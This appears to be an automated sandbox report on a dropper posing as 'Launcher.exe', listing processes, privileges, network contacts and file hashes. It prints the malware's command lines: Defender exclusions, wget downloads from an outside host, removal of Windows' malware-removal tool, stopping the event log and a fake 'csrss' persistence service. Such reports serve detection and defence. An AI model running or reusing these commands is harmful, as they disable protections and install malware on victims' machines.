fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\3plugin0222 N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\3plugin0222 N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services\3plugin0222 N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3064 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 3064 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 3064 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 3064 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 3064 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 4780 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4780 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4780 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3436 wrote to memory of 4388 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 3436 wrote to memory of 4388 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 3436 wrote to memory of 4388 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 3436 wrote to memory of 4388 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 3436 wrote to memory of 4388 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 4388 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4388 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4388 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4388 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 836 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 4388 wrote to memory of 836 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 4388 wrote to memory of 836 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 4388 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4388 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4388 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4388 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4388 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 4388 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 4388 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 4388 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\2plugin2901
PID 4388 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\2plugin2901
PID 4388 wrote to memory of 164 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 164 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 164 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4544 wrote to memory of 196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 4544 wrote to memory of 196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 1536 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 1536 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 196 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 196 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 196 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 196 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 196 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\plugin0222

C:\Users\Admin\AppData\Roaming\services\plugin0222

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\plugin0222

"C:\Users\Admin\AppData\Roaming\services\plugin0222"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 580

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\2plugin2901

C:\Users\Admin\AppData\Roaming\services\2plugin2901

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "csrss"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "csrss"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\ProgramData\SystemFiles\csrss.exe

C:\ProgramData\SystemFiles\csrss.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

conhost.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\3plugin0222

C:\Users\Admin\AppData\Roaming\services\3plugin0222

C:\Users\Admin\AppData\Roaming\services\3plugin0222

"C:\Users\Admin\AppData\Roaming\services\3plugin0222"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT

Network

Country Destination Domain Proto
US 8.8.8.8:53 apexgenz.com udp
NL 185.14.29.199:80 apexgenz.com tcp
US 8.8.8.8:53 solvadordali.com udp
US 8.8.8.8:53 199.29.14.185.in-addr.arpa udp
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
NL 185.14.29.199:80 solvadordali.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 apexgenz.com udp
NL 185.14.29.199:80 apexgenz.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 194.87.31.18:3333 tcp
US 8.8.8.8:53 18.31.87.194.in-addr.arpa udp
US 8.8.8.8:53 mezla.site udp
NL 185.209.162.106:80 mezla.site tcp
US 8.8.8.8:53 106.162.209.185.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

MD5 e5c00b0bc45281666afd14eef04252b2
SHA1 3b6eecf8250e88169976a5f866d15c60ee66b758
SHA256 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903
SHA512 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

MD5 7de0541eb96ba31067b4c58d9399693b
SHA1 a105216391bd53fa0c8f6aa23953030d0c0f9244
SHA256 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e
SHA512 e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

MD5 f0fc065f7fd974b42093594a58a4baef
SHA1 dbf28dd15d4aa338014c9e508a880e893c548d00
SHA256 d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693
SHA512 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

memory/3436-17-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/3436-16-0x0000000004B90000-0x0000000004BC6000-memory.dmp

memory/3436-18-0x0000000004AA0000-0x0000000004AB0000-memory.dmp

memory/3436-19-0x0000000004AA0000-0x0000000004AB0000-memory.dmp

memory/3436-20-0x0000000007560000-0x0000000007B88000-memory.dmp

memory/3436-21-0x0000000007C20000-0x0000000007C42000-memory.dmp

memory/3436-22-0x0000000007CC0000-0x0000000007D26000-memory.dmp

memory/3436-23-0x0000000007EA0000-0x0000000007F06000-memory.dmp

memory/3436-24-0x0000000007F10000-0x0000000008260000-memory.dmp

memory/3436-25-0x0000000008280000-0x000000000829C000-memory.dmp

memory/3436-26-0x00000000083E0000-0x000000000842B000-memory.dmp

memory/3436-27-0x0000000008680000-0x00000000086F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5rnaqad.kvf.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3436-42-0x0000000009760000-0x00000000097F4000-memory.dmp

memory/3436-43-0x00000000096E0000-0x00000000096FA000-memory.dmp

memory/3436-44-0x0000000009730000-0x0000000009752000-memory.dmp

memory/3436-45-0x0000000009D00000-0x000000000A1FE000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

MD5 fea10d11d84919cb9a0a0752d61c0a66
SHA1 aea3c65e2b62851b2dd112597f28379b49c58a0a
SHA256 2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7
SHA512 e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508

C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

MD5 f58866e5a48d89c883f3932c279004db
SHA1 e72182e9ee4738577b01359f5acbfbbe8daa2b7f
SHA256 d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12
SHA512 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

MD5 1b6de83d3f1ccabf195a98a2972c366a
SHA1 09f03658306c4078b75fa648d763df9cddd62f23
SHA256 e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724
